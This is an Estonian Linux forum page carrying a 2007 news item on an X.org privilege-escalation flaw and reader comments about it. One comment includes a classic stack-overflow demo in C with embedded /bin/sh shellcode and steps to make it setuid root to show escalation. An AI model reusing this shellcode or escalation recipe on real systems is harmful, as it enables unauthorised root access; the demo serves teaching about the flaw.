Portaal Portaal Pingviini veeb foorumi pealeht
  Viki  |  IRC  |  Otsing  |  Küsimused ja vastused  |  Profiil  |  Privaatsõnumite vaatamiseks logi sisse  | Logi sisse või Registreeru
<empty>
Logi sisse
Kasutajanimi:

Parool:

 Pea mind meeles



Unustasin parooli

Sul pole veel kontot?
Sa saad tasuta registreeruda!

Navigatsioon
  Pingviin
    Registreeru
    Uudiste Kategooriad
    Arhiivid
    Pingviini reeglid
    Viimased teemad foorumis
    Viki
    Kasutajate nimekiri
    Statistika
    Pingviin @ Facebook
    Linuxi kasutajad @ Google+
    Pingviin avaleheks
  Allalaadimised
    Viimased
    Otsing
  Reklaam
    NetiKink


Küsitlus
Kas olete peale Windows XP toe lõppemist täheldanud suuremat huvi Linuxi vastu?
Jah olen küll [ 38 ]
42%  42%  
Huvi on ikka sama suur [ 16 ]
17%  17%  
Ei ole erilist muutust täheldanud [ 36 ]
40%  40%  
Hääli kokku : 90
[ Vaata tulemusi ]

Pildid
Pildi pealkiri: suse
Postitaja: joohn1
postitatud: 07.10.2008, 00:41
Vaadatud: 684
Hinnang: pole hinnatud
Kommentaare: 0

[ Album ]

Lingid
Gentoo Linux

FSFE




ezPortal by Smartor
phpBB3 Support
Küsimused ja vastused - hiljutine tegevus
KFirefoxi uuendusAlgaja küsib09.02.2023, 14:31
KFirefoxi vanem versioon tagasiAlgaja küsib05.02.2023, 13:44
VHome partatsiooni tõstmine teisele partatsioonile või teisele kettaleAlgaja küsib27.12.2022, 09:41
KKas EMT poolt antud netipulka Huawei E173 saab kasutada Estobuntu 14.04 juuresMobiilsed seadmed06.11.2022, 17:31
KMis kiirklahvidega saab Eesti jutumärke Ubuntus?Algaja küsib01.11.2022, 15:50
VKas Linux markeerib automaatselt bad sektoreid?Varia30.03.2022, 20:04
KWin 10 ja Linux ühes arvutisVaria27.12.2021, 15:30
KHästi toimiv ID kaardi lugejaRiistvara27.10.2021, 17:41
KGrub recovery error-unknown filesystemAlgaja küsib16.10.2021, 18:35
VKuidas CDd ripida?Tarkvara16.10.2021, 08:04
KID - kaart vs. LinuxAlgaja küsib25.09.2021, 14:06
VTeatame kurbusega meie kauaaegse sõbra ja tarkvara tõlkija Marek Laane lahkumisest.Varia30.08.2021, 23:40
KEi saa vastata postitustele ega teha uusi postitusi pingviin.org'is enam.Varia28.07.2021, 12:29
KKas pingviin.org eksisteerib vaid Id-tarkvara KKK tarbeks?Algaja küsib18.07.2021, 20:37
KUnunenud parooliga irdketta failidele ligipääsemineTarkvara18.05.2021, 21:22
Vajad abi? Esita küsimus siin.

Viimased teemad foorumis
Wine turvariskid 643 07.05.2024, 20:07
Ubuntu 24.04 LTS Noble Numbat DaStoned 03.05.2024, 13:58
Vabavara talgud 2024 zeroconf 30.04.2024, 10:01
ID tarkvara 643 18.04.2024, 06:38
Openssh tagauks, mis loodi uue xz 5.6.0/5.6.1 kaudu 643 06.04.2024, 21:23
Linux Mint 21.2 on väljas overflow 06.04.2024, 21:17
Plasma shortcutiga käivitades kaovad ssh-agent muutujad DaStoned 15.02.2024, 12:41
rhino linux (ubuntu, rolling) 643 10.01.2024, 23:03
wubuntu 643 07.01.2024, 14:04
tõlkenali 643 03.12.2023, 14:13
Milline on Sinu desktop? 643 19.11.2023, 16:36
Ubuntu 22.04 Beelink SER6 MAX kõlaritesse ei saa heli Meelis 14.11.2023, 17:05
Süsteemiinfo (python) veebiserveri pealt 643 12.11.2023, 15:03
500 ja refresh php-s 643 11.11.2023, 11:52
Veebibrauseritesse lisatakse riiklik nuhkvara 643 10.11.2023, 11:59

  Viga X.org serveris
postitatud 10.01.2007, 22:27 - spott
Turvahoiatused On leitud ohtlik viga erinevates X.org serverites, mis võimaldavad X serverile ligi pääsedes võtta endale root kasutaja õigused. Kuna mitmel puhul on tegu väga lihtsa nipiga, kuidas seda teha, siis on kiiresti välja lastud ka vastavad parandused. Ohustatud on kõik X.org serveri versioonid. Erinevad distributsioonid on alustanud juba uuendatud pakettide välja laskmisega. Seega, kui Teie paketihaldur pakub uuendada X-i, siis laske see tal kindlasti teha.
Lähemat infot saate LWN.net vahendusel.

Seda uudist on vaadatud 9287 korda. Lisatud on 8 kommentaari. Postita kommentaar


11.01.2007, 14:24 by priit

Sest mulle meeldib.
St mulle meeldivad alternatiivid, seda nii Linuxi, SkyOSi, BeOSi, Haiku, QNXi jmt näol. Kõiki olen kasutanud/katsetanud ja kavatsen ka edaspidi seda teha.

11.01.2007, 14:20 by uniz

Miks sa siis debiani kasutad?

11.01.2007, 12:46 by priit

uniz kirjutas:
HoHo kirjutas:
Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.


Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..


Ma ei tea nüüd, mul oli pikka aega Windows 98 arvutis, nuhkvara küll ei olnud...

11.01.2007, 09:08 by uniz

HoHo kirjutas:
Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.


Seega ei ole kõige ebaturvalisem asi.. kõige ebaturvalisem asi on, et paljud kasutavad veel windows 98, windows xp koos ie 6- mis tõmbab igasugust nuhkvara endale sisse..

11.01.2007, 01:12 by johnsmith

Kõigepealt pead kasutajana sisse logima ja siis käivitad mingi legaalse programmi millele antakse valed parameetrid ja mille keegi assemblerit tundev koll on valmis meisterdanud.
Seal peavad mingid lisa moodulid olema ka asendatud.

Nende kõikide probleemide ema on setuid ja setgid õigusi omavad programmid.
Need programmid on tehtud, et kasutaja saaks käivitada mingi teenuse mis nõuab juure õigusi kuid olles sisse loginud tavakasutajana.
Selle asemel aga, et käivitada legaalne teenus kirjutab pätt programm puskurist üle ja käivitatakse hoopis shell juure õigustega.

Proovi ise
Kood:

#include <stdio.h>
#include <string.h>
char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[128];

int main(int argc, char **argv){
    char buffer[96];
    int i;
    long *long_ptr = (long *) large_string;
    for (i = 0; i < 32; i++)
        *(long_ptr + i) = (int) buffer;
    for (i = 0; i < (int) strlen(shellcode); i++)
        large_string[i] = shellcode[i];
    strcpy(buffer, large_string);
    return 0;
}


Kompileeri see ja su rootiks
chown root.root objektfile
chmod u+s objektfile
nüüd tagasi tavakasutajaks ja käivita see programm:
whoami ?

Tehnika on sama olenemata mis meetodit kasutatakse.


Soovitav on sellele programmile kinga anda pärast proovimist Smile

11.01.2007, 00:37 by taavi

uniz kirjutas:
Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..


Kas sa oled irooniline või täielik ignorant?

11.01.2007, 00:08 by HoHo

Kui ma nüüd väga puusse ei pane siis see viga saab ära kasutada mõni installeeritud programm. Ehk siis lisaks läbi tulemüüri ronimise peab ka masinasse logima ning mõnd spetsiaalselt augu kasutamiseks loodud programmi jooksutama.

10.01.2007, 22:33 by uniz

Ohustatud on kõik X.org serveri versioonid.
Linux ja unix on turvaline ju, mind see küll ei ohusta.. pidi turvaline olema.. ahtung! ahtung! Kui läbi tulemüüri sisse ei saa, siis pole uuendust vaja..
Powered by phpBB2 Plus based on phpBB © 2001/7 phpBB Group